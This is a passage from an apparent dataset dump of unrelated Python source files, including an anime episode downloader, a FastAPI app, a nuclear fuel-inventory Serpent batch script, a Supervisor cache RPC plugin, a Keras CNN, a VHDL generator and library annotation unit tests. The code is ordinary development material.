being prioritized over server\n sorted_by_lang = list(sorted(sorted_by_server, key=lambda x: x['version'] == version, reverse=True))\n logger.debug('Sorted sources : {}'.format(sorted_by_lang))\n\n return '' if not sorted_by_lang else [(sorted_by_lang[0]['extractor'],sorted_by_lang[0]['url'])]\n\n\n def download(self, force=False, path=None,\n format='{anime_title}_{ep_no}', range_size=None):\n \"\"\"\n Downloads episode. This might be removed in a future release.\n\n Parameters\n ----------\n force: bool\n Whether to force download or not.\n path: string\n Path to the directory/file where the file should be downloaded to.\n format: string\n The format of the filename if not provided.\n \"\"\"\n # TODO: Remove this shit\n logger.info('Downloading {}'.format(self.pretty_title))\n if format:\n file_name = util.format_filename(format, self)+'.mp4'\n\n if path is None:\n path = './' + file_name\n if path.endswith('.mp4'):\n path = path\n else:\n path = os.path.join(path, file_name)\n\n Downloader = get_downloader('http')\n downloader = Downloader(self.source(),\n path, force, range_size=range_size)\n\n downloader.download()\n\n\nclass SearchResult:\n \"\"\"\n SearchResult class holds the search result of a search done by an Anime\n class\n\n Parameters\n ----------\n title: str\n Title of the anime.\n url: str\n URL of the anime\n poster: str\n URL for the poster of the anime.\n meta: dict\n Additional metadata regarding the anime.\n\n Attributes\n ----------\n title: str\n Title of the anime.\n url: str\n URL of the anime\n poster: str\n URL for the poster of the anime.\n meta: dict\n Additional metadata regarding the anime.\n meta_info: dict\n Metadata regarding the anime. Not shown in the results, used to match with MAL\n \"\"\"\n\n def __init__(self, title, url, poster='', meta='', meta_info={}):\n self.title = title\n self.url = url\n self.poster = poster\n self.meta = meta\n self.meta_info = meta_info\n\n def __repr__(self):\n return ''.format(self.title, self.url)\n\n def __str__(self):\n return self.title\n\n @property\n def pretty_metadata(self):\n \"\"\"\n pretty_metadata is the prettified version of metadata\n \"\"\"\n if self.meta:\n return ' | '.join(val for _, val in self.meta.items())\n return ''\n"} {"ext": "py", "sha": "1a30072634fc39f2566f9e3473f156264b3066c5", "content": "import sys\n\nfrom fastapi import FastAPI, Request\n\nfrom .exceptions import CustomHTTPException\nfrom .routers import oauth, webhooks\n\nif sys.version_info[1] < 7:\n from backports.datetime_fromisoformat import MonkeyPatch\n\n MonkeyPatch.patch_fromisoformat()\n\n\napp = FastAPI()\n\n\n@app.exception_handler(CustomHTTPException)\ndef custom_http_exception_handler(request: Request, exc: CustomHTTPException):\n return exc.response\n\n\napp.include_router(oauth.router)\napp.include_router(webhooks.router)\n"} {"ext": "py", "sha": "1a3007316afbaf0d3b0079fa8d10af149bcb31c9", "content": "#Copyright ReportLab Europe Ltd. 2000-2017\n#see license.txt for license details\n#history https://hg.reportlab.com/hg-public/reportlab/log/tip/tools/pythonpoint/styles/__init__.py\n"} {"ext": "py", "sha": "1a30089d53a86042c21b7f2f23c1e8e4be3f6cb1", "content": "# -*- coding: utf-8 -*-\n\"\"\"\nFuel inventory library (UOX)\n\nScript to run computations. 
It will produce a set of folders and outputfiles\nand a csv file storing linking the output file paths to the BU, CT, IE values.\n\nzsolt elter 2019\n\"\"\"\nimport numpy as np\nimport os\nimport math\n#import pandas as pd\n#from PDfunctions import *\ndef fuelinput(wp):\n \"\"\"\n function to calculate the weight percentage of MOX nuclides\n \n formulae from http://holbert.faculty.asu.edu/eee460/NumberDensity.pdf\n \n Parameters\n ----------\n wp : float\n Plutonium content in percentage\n \n Returns\n -------\n fuelstr : str\n Serpent formatted material composition\n \n Notes\n -----\n 1, Right now the temperature is hard coded (ie ZAID ends with '.15c'), this can be modified.\n 2, Right now the density of fuel is hard coded, this can be modified\n 3, The fuel string includes Cf nuclides with 0.0w%. This is to force Serpent2 to include these\n nuclides. The reason to include them because they might be relevant in subsequent neutron coincidence\n based calculations.\n \"\"\"\n u=1000*1.660539040e-27 #g\n NA=6.0221409e23 ##/mol\n M={'U235': 235.0439299*u*NA,\n 'U234': 234.0409521*u*NA,\n 'U238': 238.05078826*u*NA,\n 'Pu238': 238.0495599*u*NA,\n 'Pu239': 239.0521634*u*NA,\n 'Pu240': 240.0538135*u*NA,\n 'Pu241': 241.0568515*u*NA,\n 'Pu242': 242.0587426*u*NA}\n \n Puvec={'Pu238':2.5/100,'Pu239':54.7/100,'Pu240':26.1/100,'Pu241':9.5/100,'Pu242':7.2/100}\n Uvec={'U234':0.0012/100,'U235':0.25/100,'U238':99.7488/100} #czsolti 0.00119 rounded to get 1\n MO16= 15.99491461956*u*NA\n rhoMOX=10.5 #g/cm3 czsolti this density falls out from the equations\n \n wp=wp/100\n \n MU=1/sum([Uvec[iso]/M[iso] for iso in Uvec])\n MPu=1/sum([Puvec[iso]/M[iso] for iso in Puvec])\n\n MHM=(1-wp)*MU+wp*MPu\n MMOX=MHM+2*MO16\n \n \n rhoHM=rhoMOX*(MHM/MMOX)\n rhoO=rhoMOX*(MO16/MMOX)\n \n MVOL={}\n for iso in Uvec:\n MVOL[iso] = (1-wp)*Uvec[iso]*rhoHM\n for iso in Puvec:\n MVOL[iso] = wp*Puvec[iso]*rhoHM\n \n M_O16=(rhoO*2)\n M_TOT=sum(MVOL.values())+M_O16\n\n fuelstr='mat MOX -10.5 burn 1'\n fuelstr=fuelstr+'\\n 92234.15c -%.8f'%(MVOL['U234']/M_TOT)\n fuelstr=fuelstr+'\\n 92235.15c -%.8f'%(MVOL['U235']/M_TOT)\n fuelstr=fuelstr+'\\n 92238.15c -%.8f'%(MVOL['U238']/M_TOT)\n fuelstr=fuelstr+'\\n 94238.15c -%.8f'%(MVOL['Pu238']/M_TOT)\n fuelstr=fuelstr+'\\n 94239.15c -%.8f'%(MVOL['Pu239']/M_TOT)\n fuelstr=fuelstr+'\\n 94240.15c -%.8f'%(MVOL['Pu240']/M_TOT)\n fuelstr=fuelstr+'\\n 94241.15c -%.8f'%(MVOL['Pu241']/M_TOT)\n fuelstr=fuelstr+'\\n 94242.15c -%.8f'%(MVOL['Pu242']/M_TOT)\n fuelstr=fuelstr+'\\n 8016.15c -%.8f'%(M_O16/M_TOT)\n fuelstr=fuelstr+'\\n 98249.15c -0.0'\n fuelstr=fuelstr+'\\n 98250.15c -0.0'\n fuelstr=fuelstr+'\\n 98251.15c -0.0'\n fuelstr=fuelstr+'\\n 98252.15c -0.0'\n fuelstr=fuelstr+'\\n 98253.15c -0.0'\n fuelstr=fuelstr+'\\n 98254.15c -0.0'\n return fuelstr\n\n### SCRIPT to run\n\n###Init array for CTs-> can be modified if other CT values are preferred.\nCT=0\nCTs=[0]\ndecstep=[]\nwhile CT<70*365:\n if CT<10*365:\n decstep.append(91.25)\n CT=CT+91.25\n CTs.append(CT)\n elif CT<40*365:\n decstep.append(2*91.25)\n CT=CT+2*91.25\n CTs.append(CT)\n else:\n decstep.append(4*91.25)\n CT=CT+4*91.25\n CTs.append(CT)\n\n#csv header\ncsvstr=',BU,CT,IE,fuelType,reactorType,serpent\\n'\n\n#path to be updated\npath=os.getcwd()+'/'\ndataFrame='fuellog_strategicPWR_MOX.csv'\ninputFileRun = open(dataFrame,'a')\ninputFileRun.write(csvstr)\ninputFileRun.close()\n\ninputFileBU = open('MOX_manyBU')\ninputFileBURefStr = inputFileBU.read()\ninputFileBU.close()\n\ninputFileCT = open('MOX_manyCT')\ninputFileCTRefStr = 
inputFileCT.read()\ninputFileCT.close()\n\nIE=np.linspace(4,10,31)\nidfuel=0\nfor ie in IE:\n fstr=fuelinput(ie)\n inputFileBUStr = inputFileBURefStr\n inputFileBUStr = inputFileBUStr.replace('fuelstr', fstr)\n \n sfile='sPWR_MOX_IE_%d'%(ie*10)\n os.chdir(path+'serpent_files/')\n os.system('mkdir IE%d'%(ie*10))\n os.chdir(path+'serpent_files/IE%d/'%(ie*10))\n inputFileRun = open(sfile,'w')\n inputFileRun.write(inputFileBUStr)\n inputFileRun.close()\n \n #pathV=path+'serpent_filesPWR_BIC/'\n #os.system('ssh '+node+' \"nice sss2 '+pathV+sfile+' -omp 64\"')\n os.system('nice sss2 '+sfile+' -omp 64')\n \n bu=5.0\n for bui in range(10,147): #5-70 MWd/kgU\n if bui not in [0,21,42,63,84,105,126]:#downtime\n os.chdir(path+'serpent_files/IE%d/'%(ie*10))\n spentmat = open(sfile+'.bumat'+str(bui)).read()\n spentmat=spentmat.replace('MOXp1r1','MOX')\n spentmat=spentmat.replace('\\n 1001.15c',' burn 1\\n 1001.15c')\n \n inputFileCTStr = inputFileCTRefStr\n inputFileCTStr = inputFileCTStr.replace('matstr', spentmat)\n \n sfilect='sPWR_MOX_IE_%d_BU_%d'%(ie*10,bu*10)\n \n os.system('mkdir BU%d'%(bu*10))\n os.chdir(path+'serpent_files/IE%d/BU%d/'%(ie*10,bu*10))\n inputFileRun = open(sfilect,'w')\n inputFileRun.write(inputFileCTStr)\n inputFileRun.close()\n os.system('nice sss2 '+sfilect+' -omp 64')\n for cti in range(131):\n filepath=path+'serpent_files/IE%d/BU%d/'%(ie*10,bu*10)+sfilect+'.bumat'+str(cti) \n \n csvstr='%d,%.2f,%.2f,%.2f,MOX,PWR,%s\\n'%(idfuel,bu,CTs[cti],ie,filepath)\n idfuel=idfuel+1\n os.chdir(path)\n inputFileRun = open(dataFrame,'a')\n inputFileRun.write(csvstr)\n inputFileRun.close()\n bu=bu+0.5\n"} {"ext": "py", "sha": "1a3008c9e3f698609041dc42ffb29cb03f4606e6", "content": "from supervisor.supervisord import SupervisorStates\nfrom supervisor.xmlrpc import Faults\nfrom supervisor.xmlrpc import RPCError\n\nAPI_VERSION = '0.2'\n\nclass CacheNamespaceRPCInterface:\n \"\"\" A Supervisor RPC interface that provides the ability\n to cache abritrary data in the Supervisor instance as key/value pairs.\n \"\"\"\n\n def __init__(self, supervisord):\n self.supervisord = supervisord\n self.cache = {}\n\n def _update(self, text):\n self.update_text = text # for unit tests, mainly\n\n state = self.supervisord.get_state()\n\n if state == SupervisorStates.SHUTDOWN:\n raise RPCError(Faults.SHUTDOWN_STATE)\n\n # XXX fatal state\n\n # RPC API methods\n\n def getAPIVersion(self):\n \"\"\" Return the version of the RPC API used by supervisor_cache\n\n @return string version\n \"\"\"\n self._update('getAPIVersion')\n return API_VERSION\n\n def getKeys(self):\n \"\"\" Return keys for all data stored in the cache\n\n @return array An array of strings representing cache keys\n \"\"\"\n self._update('getKeys')\n return sorted(self.cache.keys())\n\n def getCount(self):\n \"\"\" Return a count of all items in the cache\n\n @return integer Count of items\n \"\"\"\n self._update('getCount')\n return len(self.cache)\n\n def store(self, key, data):\n \"\"\" Store a string value in the cache, referenced by 'key'\n\n @param string key A string to use as a cache key\n @param string data A string for cache value\n @return boolean Always true unless error\n \"\"\"\n self._update('store')\n self._validateKey(key)\n\n # XMLRPC can handle non-string values\n #if not isinstance(data, str):\n # why = 'Cache data must be a string'\n # raise RPCError(Faults.INCORRECT_PARAMETERS, why)\n\n self.cache[key] = data\n return True\n\n def fetch(self, key):\n \"\"\" Retrieve data from cache stored under 'key'\n\n @param string key The 
cache key\n @return string Cache data stored at key\n \"\"\"\n self._update('fetch')\n self._validateKey(key)\n\n data = self.cache.get(key)\n if data is None:\n raise RPCError(Faults.BAD_NAME)\n return data\n\n def delete(self, key):\n \"\"\" Delete data stored in cache under 'key'\n\n @param string key The key to delete from the cache\n @return boolean Always true unless error.\n \"\"\"\n self._update('delete')\n self._validateKey(key)\n\n if key in self.cache:\n del self.cache[key]\n return True\n\n def clear(self):\n \"\"\" Clear the cache\n\n @return boolean Always true unless error.\n \"\"\"\n self._update('clear')\n self.cache.clear()\n return True\n\n def _validateKey(self, key):\n \"\"\" validate 'key' is suitable for a cache key name \"\"\"\n if not isinstance(key, str) or (key == ''):\n why = 'Cache key must be a non-empty string'\n raise RPCError(Faults.BAD_NAME, why)\n\ndef make_cache_rpcinterface(supervisord, **config):\n return CacheNamespaceRPCInterface(supervisord)\n"} {"ext": "py", "sha": "1a30099984527719ff6921cc308643f970eddd4e", "content": "from tensorflow.keras import layers, models, datasets, optimizers\nimport numpy as np\n\ndef neural_network_spatial():\n input_ = layers.Input(shape=(32,32,3))\n cnn = layers.Conv2D(16, (3,3), activation=\"relu\") (input_)\n cnn = layers.SpatialDropout2D(0.2) (cnn)\n cnn = layers.MaxPooling2D() (cnn)\n \n cnn = layers.Conv2D(32, (3,3), activation=\"relu\") (cnn)\n cnn = layers.SpatialDropout2D(0.5) (cnn)\n cnn = layers.MaxPooling2D() (cnn)\n \n flatten = layers.GlobalMaxPooling2D() (cnn)\n \n dense = layers.Dense(32, activation=\"relu\") (flatten)\n dense = layers.Dropout(0.5) (dense)\n dense = layers.Dense(16, activation=\"relu\") (dense)\n \n output = layers.Dense(10, activation=\"softmax\") (dense)\n \n opt = optimizers.Adam()\n \n m= models.Model(input_, output)\n m.compile(optimizer=opt,\n loss='categorical_crossentropy',\n metrics=['accuracy'])\n \n return m\nmodel = neural_network_spatial() # get model\nprint(model.summary())"} {"ext": "py", "sha": "1a3009b35f5b8355caff0b51ec67834425032174", "content": "import coloredlogs\nimport logging\nimport os\n\nlogging.basicConfig(\n filename=\"plex_doctor.log\",\n level=logging.DEBUG,\n format='%(levelname)s: \"%(asctime)s - %(message)s',\n)\n\nlog = logging.getLogger(\"PLEX-DOCTOR\")\nlog.setLevel(logging.DEBUG)\n\nLOGLEVEL = os.environ.get(\"LOGLEVEL\", \"INFO\").upper()\nstream_handler = logging.StreamHandler()\nstream_handler.setFormatter(\n logging.Formatter('%(levelname)s: \"%(asctime)s - %(message)s')\n)\n\nlog.addHandler(stream_handler)\n\ncoloredlogs.install(LOGLEVEL, logger=log)"} {"ext": "py", "sha": "1a300a2a94c36098cc627f24f1e9f76a0c5cef6a", "content": "#!/usr/bin/env python\n\"\"\"VHDL generation of unary operators\"\"\"\n\nimport common\n\n__author__ = \"Jon Dawson\"\n__copyright__ = \"Copyright 2010, Jonathan P Dawson\"\n__license__ = \"MIT\"\n__version__ = \"0.1.3\"\n__maintainer__ = \"Jon Dawson\"\n__email__ = \"chips@jondawson.org.uk\"\n__status__ = \"Prototype\"\n\ndef write(stream):\n\n identifier = stream.get_identifier()\n bits = stream.get_bits()\n identifier_a = stream.a.get_identifier()\n constant = stream.constant\n\n expressions = {\n 'srn' : \"STREAM_{0} <= SR( STREAM_{1}, {2})\",\n 'sln' : \"STREAM_{0} <= SL( STREAM_{1}, {2})\",\n 'abs' : \"STREAM_{0} <= ABSOLUTE(STREAM_{1})\",\n 'invert' : \"STREAM_{0} <= not STREAM_{1}\",\n 'not' : \"STREAM_{0} <= LNOT(STREAM_{1})\",\n }\n\n expression = expressions[stream.function].format(identifier, identifier_a, 
common.binary(constant, bits))\n expression = \" {0};\".format(expression)\n\n ports = [\n ]\n\n declarations = [\n \" signal STATE_{0} : BINARY_STATE_TYPE;\".format(identifier),\n \" signal STREAM_{0} : std_logic_vector({1} downto 0);\".format(identifier, bits - 1),\n \" signal STREAM_{0}_STB : std_logic;\".format(identifier),\n \" signal STREAM_{0}_ACK : std_logic;\".format(identifier),\n \"\",\n ]\n\n definitions = [\n \" --file: {0}, line: {1}\".format(stream.filename, stream.lineno),\n \" --STREAM {0} Unary({1}, {2}, '{3}')\".format(identifier, identifier_a, constant, stream.function),\n \" process\",\n \" begin\",\n \" wait until rising_edge(CLK);\",\n \" case STATE_{0} is\".format(identifier),\n \" when BINARY_INPUT =>\",\n \" if STREAM_{0}_STB = '1' then\".format(identifier_a),\n \" STREAM_{0}_ACK <= '1';\".format(identifier_a),\n expression,\n \" STREAM_{0}_STB <= '1';\".format(identifier),\n \" STATE_{0} <= BINARY_OUTPUT;\".format(identifier),\n \" end if;\",\n \" when BINARY_OUTPUT =>\",\n \" STREAM_{0}_ACK <= '0';\".format(identifier_a),\n \" if STREAM_{0}_ACK = '1' then\".format(identifier),\n \" STREAM_{0}_STB <= '0';\".format(identifier),\n \" STATE_{0} <= BINARY_INPUT;\".format(identifier),\n \" end if;\",\n \" end case;\",\n \" if RST = '1' then\",\n \" STREAM_{0}_STB <= '0';\".format(identifier),\n \" STREAM_{0}_ACK <= '0';\".format(identifier_a),\n \" STATE_{0} <= BINARY_INPUT;\".format(identifier),\n \" end if;\",\n \" end process;\",\n \"\",\n ]\n\n return ports, declarations, definitions\n"} {"ext": "py", "sha": "1a300c2dc35aa09e1cd804c7e387dc31876d8779", "content": "from arm.logicnode.arm_nodes import *\n\nclass OnContactArrayNode(ArmLogicTreeNode):\n \"\"\"Activates the output when the given rigid body make contact with other given rigid bodies.\"\"\"\n bl_idname = 'LNOnContactArrayNode'\n bl_label = 'On Contact Array'\n arm_section = 'contact'\n arm_version = 1\n\n property0: EnumProperty(\n items = [('begin', 'Begin', 'The contact between the rigid bodies begins'),\n ('overlap', 'Overlap', 'The contact between the rigid bodies is happening'),\n ('end', 'End', 'The contact between the rigid bodies ends')],\n name='', default='begin')\n\n def init(self, context):\n super(OnContactArrayNode, self).init(context)\n self.add_input('ArmNodeSocketObject', 'RB')\n self.add_input('ArmNodeSocketArray', 'RBs')\n\n self.add_output('ArmNodeSocketAction', 'Out')\n\n def draw_buttons(self, context, layout):\n layout.prop(self, 'property0')\n"} {"ext": "py", "sha": "1a300c6d0dabf14e31123f23b2e574db609135a8", "content": "#!/usr/bin/env python\n\nfrom load import ROOT as R\nfrom gna.unittest import *\nfrom gna.env import env\nimport gna.constructors as C\nimport numpy as N\nfrom gna import context\nimport gna.bindings.arrayview\n\n@floatcopy(globals(), True)\ndef test_vararray_preallocated_v01(function_name):\n ns = env.globalns(function_name)\n\n names = [ 'zero', 'one', 'two', 'three', 'four', 'five' ]\n values = N.arange(len(names), dtype=context.current_precision_short())\n variables = R.vector('variable<%s>'%context.current_precision())()\n\n with context.allocator(100) as allocator:\n for name, value in zip(names, values):\n par = ns.defparameter(name, central=value, relsigma=0.1)\n variables.push_back(par.getVariable())\n\n with ns:\n vsum = C.VarSum(names, 'sum', ns=ns)\n vsum_var=ns['sum'].get()\n variables.push_back(vsum_var.getVariable())\n vprod = C.VarProduct(names, 'product', ns=ns)\n vprod_var=ns['product'].get()\n variables.push_back(vprod_var.getVariable())\n\n va = 
C.VarArrayPreallocated(variables)\n\n pool=allocator.view()\n res=va.vararray.points.data()\n\n values_all = N.zeros(shape=values.size+2, dtype=values.dtype)\n values_all[:-2]=values\n values_all[-2]=values_all[:-2].sum()\n values_all[-1]=values_all[:-2].prod()\n\n print('Python array:', values_all)\n print('VarArray (preallocated):', res)\n print('Pool:', pool)\n\n assert (values_all==res).all()\n assert (values_all==pool).all()\n assert (res==pool).all()\n\n for i, (val, name) in enumerate(enumerate(names, 2)):\n ns[name].set(val)\n values_all[i]=val\n values_all[-2]=values_all[:-2].sum()\n values_all[-1]=values_all[:-2].prod()\n res=va.vararray.points.data()\n\n print('Iteration', i)\n print(' Python array:', values_all)\n print(' VarArray (preallocated):', res)\n\n assert (values_all==res).all()\n assert (values_all==pool).all()\n assert (res==pool).all()\n\nif __name__ == '__main__':\n run_unittests(globals())\n"} {"ext": "py", "sha": "1a300ce0d6ee0b9f711e5b7905619ea8718207cf", "content": "import json\nimport datetime\nfrom pyld import jsonld\n\nfrom core.testing import DatabaseTest\nfrom core.util.datetime_helpers import utc_now\nfrom .test_controller import ControllerTest\n\nfrom core.model import (\n Annotation,\n create,\n)\n\nfrom api.annotations import (\n AnnotationWriter,\n AnnotationParser,\n)\nfrom api.problem_details import *\n\nclass AnnotationTest(DatabaseTest):\n\n def _patron(self):\n \"\"\"Create a test patron who has opted in to annotation sync.\"\"\"\n patron = super(AnnotationTest, self)._patron()\n patron.synchronize_annotations = True\n return patron\n\n\nclass TestAnnotationWriter(AnnotationTest, ControllerTest):\n\n def test_annotations_for(self):\n patron = self._patron()\n\n # The patron doesn't have any annotations yet.\n assert [] == AnnotationWriter.annotations_for(patron)\n\n identifier = self._identifier()\n annotation, ignore = create(\n self._db, Annotation,\n patron=patron,\n identifier=identifier,\n motivation=Annotation.IDLING,\n )\n\n # The patron has one annotation.\n assert [annotation] == AnnotationWriter.annotations_for(patron)\n assert [annotation] == AnnotationWriter.annotations_for(patron, identifier)\n\n identifier2 = self._identifier()\n annotation2, ignore = create(\n self._db, Annotation,\n patron=patron,\n identifier=identifier2,\n motivation=Annotation.IDLING,\n )\n\n # The patron has two annotations for different identifiers.\n assert set([annotation, annotation2]) == set(AnnotationWriter.annotations_for(patron))\n assert [annotation] == AnnotationWriter.annotations_for(patron, identifier)\n assert [annotation2] == AnnotationWriter.annotations_for(patron, identifier2)\n\n def test_annotation_container_for(self):\n patron = self._patron()\n\n with self.app.test_request_context(\"/\"):\n container, timestamp = AnnotationWriter.annotation_container_for(patron)\n\n assert (set([AnnotationWriter.JSONLD_CONTEXT, AnnotationWriter.LDP_CONTEXT]) ==\n set(container['@context']))\n assert \"annotations\" in container[\"id\"]\n assert set([\"BasicContainer\", \"AnnotationCollection\"]) == set(container[\"type\"])\n assert 0 == container[\"total\"]\n\n first_page = container[\"first\"]\n assert \"AnnotationPage\" == first_page[\"type\"]\n\n # The page doesn't have a context, since it's in the container.\n assert None == first_page.get('@context')\n\n # The patron doesn't have any annotations yet.\n assert 0 == container['total']\n\n # There's no timestamp since the container is empty.\n assert None == timestamp\n\n # Now, add an annotation.\n 
identifier = self._identifier()\n annotation, ignore = create(\n self._db, Annotation,\n patron=patron,\n identifier=identifier,\n motivation=Annotation.IDLING,\n )\n annotation.timestamp = utc_now()\n\n container, timestamp = AnnotationWriter.annotation_container_for(patron)\n\n # The context, type, and id stay the same.\n assert (set([AnnotationWriter.JSONLD_CONTEXT, AnnotationWriter.LDP_CONTEXT]) ==\n set(container['@context']))\n assert \"annotations\" in container[\"id\"]\n assert identifier.identifier not in container[\"id\"]\n assert set([\"BasicContainer\", \"AnnotationCollection\"]) == set(container[\"type\"])\n\n # But now there is one item.\n assert 1 == container['total']\n\n first_page = container[\"first\"]\n\n assert 1 == len(first_page['items'])\n\n # The item doesn't have a context, since it's in the container.\n first_item = first_page['items'][0]\n assert None == first_item.get('@context')\n\n # The timestamp is the annotation's timestamp.\n assert annotation.timestamp == timestamp\n\n # If the annotation is deleted, the container will be empty again.\n annotation.active = False\n\n container, timestamp = AnnotationWriter.annotation_container_for(patron)\n assert 0 == container['total']\n assert None == timestamp\n\n def test_annotation_container_for_with_identifier(self):\n patron = self._patron()\n identifier = self._identifier()\n\n with self.app.test_request_context(\"/\"):\n container, timestamp = AnnotationWriter.annotation_container_for(patron, identifier)\n\n assert (set([AnnotationWriter.JSONLD_CONTEXT, AnnotationWriter.LDP_CONTEXT]) ==\n set(container['@context']))\n assert \"annotations\" in container[\"id\"]\n assert identifier.identifier in container[\"id\"]\n assert set([\"BasicContainer\", \"AnnotationCollection\"]) == set(container[\"type\"])\n assert 0 == container[\"total\"]\n\n first_page = container[\"first\"]\n assert \"AnnotationPage\" == first_page[\"type\"]\n\n # The page doesn't have a context, since it's in the container.\n assert None == first_page.get('@context')\n\n # The patron doesn't have any annotations yet.\n assert 0 == container['total']\n\n # There's no timestamp since the container is empty.\n assert None == timestamp\n\n # Now, add an annotation for this identifier, and one for a different identifier.\n annotation, ignore = create(\n self._db, Annotation,\n patron=patron,\n identifier=identifier,\n motivation=Annotation.IDLING,\n )\n annotation.timestamp = utc_now()\n\n other_annotation, ignore = create(\n self._db, Annotation,\n patron=patron,\n identifier=self._identifier(),\n motivation=Annotation.IDLING,\n )\n\n container, timestamp = AnnotationWriter.annotation_container_for(patron, identifier)\n\n # The context, type, and id stay the same.\n assert (set([AnnotationWriter.JSONLD_CONTEXT, AnnotationWriter.LDP_CONTEXT]) ==\n set(container['@context']))\n assert \"annotations\" in container[\"id\"]\n assert identifier.identifier in container[\"id\"]\n assert set([\"BasicContainer\", \"AnnotationCollection\"]) == set(container[\"type\"])\n\n # But now there is one item.\n assert 1 == container['total']\n\n first_page = container[\"first\"]\n\n assert 1 == len(first_page['items'])\n\n # The item doesn't have a context, since it's in the container.\n first_item = first_page['items'][0]\n assert None == first_item.get('@context')\n\n # The timestamp is the annotation's timestamp.\n assert annotation.timestamp == timestamp\n\n # If the annotation is deleted, the container will be empty again.\n annotation.active = False\n\n container, 
timestamp = AnnotationWriter.annotation_container_for(patron, identifier)\n assert 0 == container['total']\n assert None == timestamp\n\n def test_annotation_page_for(self):\n patron = self._patron()\n\n with self.app.test_request_context(\"/\"):\n page = AnnotationWriter.annotation_page_for(patron)\n\n # The patron doesn't have any annotations, so the page is empty.\n assert AnnotationWriter.JSONLD_CONTEXT == page['@context']\n assert 'annotations' in page['id']\n assert 'AnnotationPage' == page['type']\n assert 0 == len(page['items'])\n\n # If we add an annotation, the page will have an item.\n identifier = self._identifier()\n annotation, ignore = create(\n self._db, Annotation,\n patron=patron,\n identifier=identifier,\n motivation=Annotation.IDLING,\n )\n\n page = AnnotationWriter.annotation_page_for(patron)\n\n assert 1 == len(page['items'])\n\n # But if the annotation is deleted, the page will be empty again.\n annotation.active = False\n\n page = AnnotationWriter.annotation_page_for(patron)\n\n assert 0 == len(page['items'])\n\n def test_annotation_page_for_with_identifier(self):\n patron = self._patron()\n identifier = self._identifier()\n\n with self.app.test_request_context(\"/\"):\n page = AnnotationWriter.annotation_page_for(patron, identifier)\n\n # The patron doesn't have any annotations, so the page is empty.\n assert AnnotationWriter.JSONLD_CONTEXT == page['@context']\n assert 'annotations' in page['id']\n assert identifier.identifier in page['id']\n assert 'AnnotationPage' == page['type']\n assert 0 == len(page['items'])\n\n # If we add an annotation, the page will have an item.\n annotation, ignore = create(\n self._db, Annotation,\n patron=patron,\n identifier=identifier,\n motivation=Annotation.IDLING,\n )\n\n page = AnnotationWriter.annotation_page_for(patron, identifier)\n assert 1 == len(page['items'])\n\n # If a different identifier has an annotation, the page will still have one item.\n other_annotation, ignore = create(\n self._db, Annotation,\n patron=patron,\n identifier=self._identifier(),\n motivation=Annotation.IDLING,\n )\n\n page = AnnotationWriter.annotation_page_for(patron, identifier)\n assert 1 == len(page['items'])\n\n # But if the annotation is deleted, the page will be empty again.\n annotation.active = False\n\n page = AnnotationWriter.annotation_page_for(patron, identifier)\n assert 0 == len(page['items'])\n\n def test_detail_target(self):\n patron = self._patron()\n identifier = self._identifier()\n target = {\n \"http://www.w3.org/ns/oa#hasSource\": {\n \"@id\": identifier.urn\n },\n \"http://www.w3.org/ns/oa#hasSelector\": {\n \"@type\": \"http://www.w3.org/ns/oa#FragmentSelector\",\n \"http://www.w3.org/1999/02/22-rdf-syntax-ns#value\": \"epubcfi(/6/4[chap01ref]!/4[body01]/10[para05]/3:10)\"\n }\n }\n\n annotation, ignore = create(\n self._db, Annotation,\n patron=patron,\n identifier=identifier,\n motivation=Annotation.IDLING,\n target=json.dumps(target),\n )\n\n with self.app.test_request_context(\"/\"):\n detail = AnnotationWriter.detail(annotation)\n\n assert \"annotations/%i\" % annotation.id in detail[\"id\"]\n assert \"Annotation\" == detail['type']\n assert Annotation.IDLING == detail['motivation']\n compacted_target = {\n \"source\": identifier.urn,\n \"selector\": {\n \"type\": \"FragmentSelector\",\n \"value\": \"epubcfi(/6/4[chap01ref]!/4[body01]/10[para05]/3:10)\"\n }\n }\n assert compacted_target == detail[\"target\"]\n\n def test_detail_body(self):\n patron = self._patron()\n identifier = self._identifier()\n body = {\n 
\"@type\": \"http://www.w3.org/ns/oa#TextualBody\",\n \"http://www.w3.org/ns/oa#bodyValue\": \"A good description of the topic that bears further investigation\",\n \"http://www.w3.org/ns/oa#hasPurpose\": {\n \"@id\": \"http://www.w3.org/ns/oa#describing\"\n }\n }\n\n annotation, ignore = create(\n self._db, Annotation,\n patron=patron,\n identifier=identifier,\n motivation=Annotation.IDLING,\n content=json.dumps(body),\n )\n\n with self.app.test_request_context(\"/\"):\n detail = AnnotationWriter.detail(annotation)\n\n assert \"annotations/%i\" % annotation.id in detail[\"id\"]\n assert \"Annotation\" == detail['type']\n assert Annotation.IDLING == detail['motivation']\n compacted_body = {\n \"type\": \"TextualBody\",\n \"bodyValue\": \"A good description of the topic that bears further investigation\",\n \"purpose\": \"describing\"\n }\n assert compacted_body == detail[\"body\"]\n\n\nclass TestAnnotationParser(AnnotationTest):\n def setup_method(self):\n super(TestAnnotationParser, self).setup_method()\n self.pool = self._licensepool(None)\n self.identifier = self.pool.identifier\n self.patron = self._patron()\n\n def _sample_jsonld(self, motivation=Annotation.IDLING):\n data = dict()\n data[\"@context\"] = [AnnotationWriter.JSONLD_CONTEXT,\n {'ls': Annotation.LS_NAMESPACE}]\n data[\"type\"] = \"Annotation\"\n motivation = motivation.replace(Annotation.LS_NAMESPACE, 'ls:')\n motivation = motivation.replace(Annotation.OA_NAMESPACE, 'oa:')\n data[\"motivation\"] = motivation\n data[\"body\"] = {\n \"type\": \"TextualBody\",\n \"bodyValue\": \"A good description of the topic that bears further investigation\",\n \"purpose\": \"describing\"\n }\n data[\"target\"] = {\n \"source\": self.identifier.urn,\n \"selector\": {\n \"type\": \"oa:FragmentSelector\",\n \"value\": \"epubcfi(/6/4[chap01ref]!/4[body01]/10[para05]/3:10)\"\n }\n }\n return data\n\n def test_parse_invalid_json(self):\n annotation = AnnotationParser.parse(self._db, \"not json\", self.patron)\n assert INVALID_ANNOTATION_FORMAT == annotation\n\n def test_invalid_identifier(self):\n # If the target source can't be parsed as a URN we send\n # INVALID_ANNOTATION_TARGET\n data = self._sample_jsonld()\n data['target']['source'] = 'not a URN'\n annotation = AnnotationParser.parse(\n self._db, json.dumps(data), self.patron\n )\n assert INVALID_ANNOTATION_TARGET == annotation\n\n def test_null_id(self):\n # A JSON-LD document can have its @id set to null -- it's the\n # same as if the @id wasn't present -- but the jsonld library\n # can't handle this, so we need to test it specially.\n self.pool.loan_to(self.patron)\n data = self._sample_jsonld()\n data['id'] = None\n annotation = AnnotationParser.parse(\n self._db, json.dumps(data), self.patron\n )\n assert isinstance(annotation, Annotation)\n\n def 